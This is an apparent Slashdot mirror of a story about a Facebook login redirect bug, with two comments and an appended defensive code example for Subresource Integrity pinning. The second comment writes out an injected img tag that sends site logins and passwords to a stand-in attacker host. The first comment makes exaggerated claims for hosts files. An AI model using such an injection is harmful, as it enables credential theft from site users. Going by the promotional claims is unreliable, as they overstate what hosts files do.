Slashdot Mirror


Facebook Breaks Major Websites With Redirection Bug

johnsnails writes "Some of the biggest news sites in the world disappeared yesterday when Facebook took over the internet with a redirection bug. Visitors to sites such as The Washington Post, BuzzFeed, the Gawker network, NBC News and News.com.au were immediately transferred to a Facebook error page upon loading their intended site. It was fixed quickly, and Facebook provided this statement: 'For a short period of time, there was a bug that redirected people logging in with Facebook from third party sites to Facebook.com. The issue was quickly resolved, and Login with Facebook is now working as usual.'"

2 of 179 comments

  1. AdBlock & Ghostery = inferior to hosts by Anonymous Coward · Score: -1, Offtopic

    Especially on this note of redirection (hosts file hardcodes stop that, for one thing, ALONG WITH ADBANNERS TOO - plus custom hosts files can do 10 things listed below, adblock can't, period...):

    ---

    APK Hosts File Engine 5.0++ 32/64-bit:

    http://start64.com/index.php?option=com_content&view=article&id=5851:apk-hosts-file-engine-64bit-version&catid=26:64bit-security-software&Itemid=74

    Which, if you read the list of what it can do for you as an end user of the resulting output it produces listed in the link above, you'll understand how/why...

    "It's as strong as steel, & a 3rd of the weight" - Howard Stark from the film "Captain America"

    ---

    Especially vs. competing alternate 'solutions', noted below in AdBlock/Ghostery & yes even DNS servers, next, as 'examples thereof'...

    Solutions that used to be good & I even recommended them in security guides I wrote up over the decades now -> http://www.google.com/search?hl=en&tbo=d&output=search&sclient=psy-ab&q=%22HOW+TO+SECURE+Windows+2000/XP%22&btnG=Submit&gbv=1&sei=ka3yUKzxB-6_0QHLroCQCA

    That did extremely well for myself (and users of them), for Windows users, for "layered-security"/"defense-in-depth" purposes - the BEST THING WE HAVE GOING vs. threats of all kinds, currently!

    (Not anymore though, & certainly NOT far as AdBlock's concerned especially, not after this):

    ---

    Adblock Plus To Offer 'Acceptable Ads' Option:

    http://news.slashdot.org/story/11/12/12/2213233/adblock-plus-to-offer-acceptable-ads-option

    (Meaning by default, which MOST USERS WON'T CHANGE, it doesn't block ALL ads - they "souled-out"... talk about "foxes guarding the henhouse")!

    ---

    Plus, Adblock CAN'T DO AS MUCH & not from a single file solution that runs in Ring 0/RPL 0/kernelmode via tcpip.sys, a driver (since it's part of the IP stack & tightly integrated into it) which is far, Far, FAR FASTER than ring 3/rpl 3/usermode apps like browsers, & addons slow them down (known issue in Firefox).

    To wit, 10++ things AdBlock can't do, hosts can:

    ---

    1.) Blocking rogue DNS servers malware makers use

    2.) Blocking known sites/servers that serve up malware... like known sites/servers/hosts-domains that serve up malicious scripts

    3.) Speeding up your FAVORITE SITES that hosts can speed up via hardcoded line item entries properly resolved by a reverse DNS ping

    4.) AdBlock works on Mozilla products (browser & email), hosts work on ANY webbound app AND are multiplatform.

    5.) AdBlock can't protect external to Firefox email programs, hosts can (think OUTLOOK, Eudora, & others)

    6.) AdBlock can't help you blow past DNSBL's (DNS block lists)

    7.) AdBlock can't help you avoid DNS request logs (hosts can via hardcoded favorites)

    8.) AdBlock can't protect you vs. TRACKERS (hosts can)

    9.) AdBlock can't protect you vs. DOWNED or "DNS-poisoned" redirected DNS servers (hosts can by hardcodes)

    10.) Hosts are EASIER to manage, they're just a text file (adblock means you had BEST know your javascript, perl, & python (iirc as to what languages are used to make it from source)).

    & more... as a tiny 'sampling' & proofs thereof!

    ---

    Same with Ghostery:

    ---

    Evidon, which makes Ghostery, is an advertising company.

    They were originally named Better Advertising, Inc., but changed their name for obvious

  2. Re:And... by Anonymous Coward · Score: 0, Offtopic

    I shudder thinking what havoc you could cause if you managed to hijack one of the big JS library CDNs.

    For example, just imagine every copy of jQuery from Google's CDN also including instructions to add '<img src="http://buttfuck.me/lol?domain=$window.domain&login=$login&pass=$pass">' on clicking the login button - even if it'd be up for just a few minutes, you'd still probably get millions of user accounts sent to you.

    The economic impact would be huge, with thousands of sites scouring logs and resetting compromised logins and users having to check and reset every password.

    Only a tiny minority uses NoScript, and then some sites require scripts to function - so you should also use some tricks to replace them with locally cached versions. I really hope those CDN servers are in a secure location with write access only for verified personnel physically present on site.
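
Added example, not part of the thread or of any site's own code: the comment above worries about a tampered library copy served from a CDN and suggests locally cached versions. One way to act on that is to pin the script to a digest of a reviewed copy, in the format used by the browser `integrity` attribute (Subresource Integrity), and fall back to the local copy on mismatch. The function names and sample bytes below are constructed for illustration, and the code assumes Node.js.

```javascript
// Added example: digest-pin a third-party script and fall back to a local copy.
const { createHash } = require('node:crypto');

// Relative strength of the digest algorithms the integrity format allows.
const STRENGTH = new Map([['sha256', 1], ['sha384', 2], ['sha512', 3]]);
const algoOf = (token) => token.split('-', 1)[0];

// Build an integrity value ("sha384-<base64 digest>") from reviewed bytes.
function sriValue(body, algo = 'sha384') {
  return `${algo}-${createHash(algo).update(body).digest('base64')}`;
}

// True only if `body` matches a pin that uses the strongest algorithm listed,
// so a weaker digest in the same string cannot be used to downgrade the check.
// Assumption of this example: unknown or missing algorithms fail closed.
function matchesPin(body, integrity) {
  const pins = integrity.trim().split(/\s+/).filter((t) => STRENGTH.has(algoOf(t)));
  if (pins.length === 0) return false;
  const best = Math.max(...pins.map((t) => STRENGTH.get(algoOf(t))));
  return pins
    .filter((t) => STRENGTH.get(algoOf(t)) === best)
    .some((t) => t === sriValue(body, algoOf(t)));
}

// Prefer the CDN copy when it matches the pin, then the locally cached copy,
// and refuse to run anything when neither matches.
function selectScript(pin, cdnBody, localBody) {
  if (cdnBody && matchesPin(cdnBody, pin)) return { source: 'cdn', body: cdnBody };
  if (localBody && matchesPin(localBody, pin)) return { source: 'local', body: localBody };
  return { source: 'blocked', body: null };
}

// Constructed sample data: a stand-in for a reviewed library build, and the
// same bytes with one extra line appended to represent a modified CDN copy.
const vetted = Buffer.from('/* constructed stand-in for a reviewed library build */\n');
const tampered = Buffer.concat([vetted, Buffer.from('/* constructed: line added upstream */\n')]);
const PIN = sriValue(vetted);

console.log(PIN);
console.log(selectScript(PIN, vetted, vetted).source);
console.log(selectScript(PIN, tampered, vetted).source);
console.log(selectScript(PIN, tampered, tampered).source);
```

In a page, the same pin goes in the `integrity` attribute of the `<script>` tag together with `crossorigin="anonymous"`, and the browser performs the comparison before executing the file.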